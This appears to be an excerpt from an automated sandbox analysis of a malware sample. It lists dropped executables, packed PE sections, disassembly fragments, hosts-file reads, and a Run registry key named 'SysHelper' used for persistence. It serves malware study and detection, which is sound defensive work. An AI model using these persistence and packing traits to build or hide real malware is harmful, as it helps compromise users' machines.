Source: 17.0.42FE.exe.340000.0.unpack, Stub/Program.cs	Base64 encoded string: 'U09GVFdBUkVcTWljcm9zb2Z0XFdpbmRvd3NcQ3VycmVudFZlcnNpb25cUnVu'

Source: C:\Windows\SysWOW64\WerFault.exe	Mutant created: \BaseNamedObjects\Local\SM0:1816:64:WilError_01
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:920:120:WilError_01
Source: C:\Windows\SysWOW64\WerFault.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess3960
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5064:120:WilError_01
Source: C:\Windows\SysWOW64\WerFault.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess4776

Source: C:\Windows\explorer.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Windows\explorer.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\A4A.exe	File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Users\user\AppData\Local\Temp\A4A.exe	File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Windows\SysWOW64\WerFault.exe	File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Windows\SysWOW64\WerFault.exe	File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Windows\SysWOW64\WerFault.exe	File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Windows\SysWOW64\WerFault.exe	File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Users\user\AppData\Local\Temp\ECAC.exe	File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Users\user\AppData\Local\Temp\ECAC.exe	File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Users\user\AppData\Local\Temp\DC3D.exe	File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Users\user\AppData\Local\Temp\DC3D.exe	File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Users\user\AppData\Local\Temp\llpb1133.exe	File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Users\user\AppData\Local\Temp\llpb1133.exe	File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Users\user\AppData\Local\Temp\llpb1133.exe	File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Users\user\AppData\Local\Temp\llpb1133.exe	File read: C:\Windows\System32\drivers\etc\hosts

Source: C:\Users\user\Desktop\file.exe	Unpacked PE file: 0.2.file.exe.400000.0.unpack .text:ER;.data:W;.xepexi:W;.bigisi:W;.rsrc:R; vs .text:EW;
Source: C:\Users\user\AppData\Roaming\rirdbih	Unpacked PE file: 11.2.rirdbih.400000.0.unpack .text:ER;.data:W;.xepexi:W;.bigisi:W;.rsrc:R; vs .text:EW;
Source: C:\Users\user\AppData\Local\Temp\8EAD.exe	Unpacked PE file: 14.2.8EAD.exe.400000.0.unpack .text:ER;.data:W;.rsrc:R; vs .text:ER;.rdata:R;.data:W;.rsrc:R;.reloc:R;
Source: C:\Users\user\AppData\Local\Temp\F207.exe	Unpacked PE file: 15.2.F207.exe.400000.0.unpack .text:ER;.data:W;.yij:W;.xad:W;.rsrc:R; vs .text:EW;
Source: C:\Users\user\AppData\Local\Temp\DE4C.exe	Unpacked PE file: 16.2.DE4C.exe.400000.0.unpack .text:ER;.data:W;.hurenac:W;.lized:W;.rsrc:R; vs .text:EW;
Source: C:\Users\user\AppData\Local\Temp\A4A.exe	Unpacked PE file: 18.2.A4A.exe.400000.0.unpack .text:ER;.data:W;.lixo:W;.bobo:W;.rsrc:R; vs .text:ER;.rdata:R;.data:W;.rsrc:R;.reloc:R;
Source: C:\Users\user\AppData\Local\Temp\9760.exe	Unpacked PE file: 20.2.9760.exe.400000.0.unpack .text:ER;.data:W;.jav:W;.lutu:W;.rsrc:R; vs .text:EW;
Source: C:\Users\user\AppData\Local\Temp\849F.exe	Unpacked PE file: 23.2.849F.exe.400000.0.unpack .text:ER;.data:W;.vib:W;.nuroz:W;.rsrc:R; vs .text:EW;
Source: C:\Users\user\AppData\Local\Temp\ECAC.exe	Unpacked PE file: 29.2.ECAC.exe.400000.0.unpack .text:ER;.data:W;.lixo:W;.bobo:W;.rsrc:R; vs .text:ER;.rdata:R;.data:W;.rsrc:R;.reloc:R;
Source: C:\Users\user\AppData\Local\Temp\DC3D.exe	Unpacked PE file: 31.2.DC3D.exe.400000.0.unpack .text:ER;.data:W;.yaz:W;.katosa:W;.rsrc:R; vs .text:ER;.rdata:R;.data:W;.rsrc:R;.reloc:R;

Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_0040C595 push ecx; ret	0_2_0040C5A8
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00752FDD push 6700D42Eh; retf	0_2_00752FE7
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00746CAD push ebp; retf	0_2_00746ED9
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00746C91 push ebp; retf	0_2_00746ED9
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00752185 push 623D8A45h; retf	0_2_0075218A
Source: C:\Users\user\AppData\Local\Temp\1128.exe	Code function: 9_2_004080AD push ecx; ret	9_2_004080C0
Source: C:\Users\user\AppData\Local\Temp\1128.exe	Code function: 9_2_00F2C608 push esp; retf 91AFh	9_2_00F2C61D
Source: C:\Users\user\AppData\Roaming\rirdbih	Code function: 11_2_0040C595 push ecx; ret	11_2_0040C5A8
Source: C:\Windows\System32\rundll32.exe	Code function: 12_2_00007FFD17916F84 push rax; ret	12_2_00007FFD17919222
Source: C:\Windows\System32\rundll32.exe	Code function: 12_2_00007FFD17919088 push rax; ret	12_2_00007FFD17919089
Source: C:\Windows\System32\rundll32.exe	Code function: 12_2_00007FFD17919070 push rax; retf	12_2_00007FFD17919071
Source: C:\Windows\System32\rundll32.exe	Code function: 12_2_00000156EF980003 push esp; retf 91AFh	12_2_00000156EF980009

Source: file.exe	Static PE information: section name: .xepexi
Source: file.exe	Static PE information: section name: .bigisi
Source: 1AED.exe.1.dr	Static PE information: section name: .mexatol
Source: 1AED.exe.1.dr	Static PE information: section name: .cadaya
Source: B336.exe.1.dr	Static PE information: section name: .symtab
Source: DE4C.exe.1.dr	Static PE information: section name: .hurenac
Source: DE4C.exe.1.dr	Static PE information: section name: .lized
Source: 9760.exe.1.dr	Static PE information: section name: .jav
Source: 9760.exe.1.dr	Static PE information: section name: .lutu
Source: 849F.exe.1.dr	Static PE information: section name: .vib
Source: 849F.exe.1.dr	Static PE information: section name: .nuroz
Source: ECAC.exe.1.dr	Static PE information: section name: .lixo
Source: ECAC.exe.1.dr	Static PE information: section name: .bobo
Source: DC3D.exe.1.dr	Static PE information: section name: .yaz
Source: DC3D.exe.1.dr	Static PE information: section name: .katosa
Source: 1128.exe.1.dr	Static PE information: section name: Fdfgtrg
Source: A4A.exe.1.dr	Static PE information: section name: .lixo
Source: A4A.exe.1.dr	Static PE information: section name: .bobo
Source: F207.exe.1.dr	Static PE information: section name: .yij
Source: F207.exe.1.dr	Static PE information: section name: .xad
Source: ADEC.exe.1.dr	Static PE information: section name: .todur
Source: ADEC.exe.1.dr	Static PE information: section name: .bimole
Source: C597.exe.1.dr	Static PE information: section name: .geguja
Source: C597.exe.1.dr	Static PE information: section name: .dilef
Source: rirdbih.1.dr	Static PE information: section name: .xepexi
Source: rirdbih.1.dr	Static PE information: section name: .bigisi
Source: sardbih.1.dr	Static PE information: section name: .yij
Source: sardbih.1.dr	Static PE information: section name: .xad
Source: gdrdbih.1.dr	Static PE information: section name: .vib
Source: gdrdbih.1.dr	Static PE information: section name: .nuroz
Source: 170F.tmp.exe.12.dr	Static PE information: section name: beew93K
Source: llpb1133.exe.17.dr	Static PE information: section name: _RDATA
Source: llpb1133.exe.17.dr	Static PE information: section name: .vmp0
Source: llpb1133.exe.17.dr	Static PE information: section name: .vmp1
Source: A4A.exe.18.dr	Static PE information: section name: .lixo
Source: A4A.exe.18.dr	Static PE information: section name: .bobo

Source: yuzhenzhang.exe.17.dr	Static PE information: real checksum: 0x2b520 should be: 0x29e17
Source: 352F.exe.1.dr	Static PE information: real checksum: 0x0 should be: 0x3b383b
Source: 170F.tmp.exe.12.dr	Static PE information: real checksum: 0x0 should be: 0x3bfca0
Source: B336.exe.1.dr	Static PE information: real checksum: 0x0 should be: 0x98b5dd
Source: llpb1133.exe.17.dr	Static PE information: real checksum: 0x0 should be: 0x38b641
Source: FD42.exe.1.dr	Static PE information: real checksum: 0x0 should be: 0x6467
Source: vcredist_5f4680.dll.9.dr	Static PE information: real checksum: 0x0 should be: 0xdd77
Source: 42FE.exe.1.dr	Static PE information: real checksum: 0x0 should be: 0x3b383b

Source: C:\Windows\explorer.exe	File created: C:\Users\user\AppData\Roaming\rirdbih	Jump to dropped file
Source: C:\Windows\explorer.exe	File created: C:\Users\user\AppData\Roaming\sardbih	Jump to dropped file
Source: C:\Windows\explorer.exe	File created: C:\Users\user\AppData\Roaming\gdrdbih	Jump to dropped file

Source: C:\Users\user\AppData\Local\Temp\A4A.exe	Registry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run SysHelper
Source: C:\Users\user\AppData\Local\Temp\A4A.exe	Registry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run SysHelper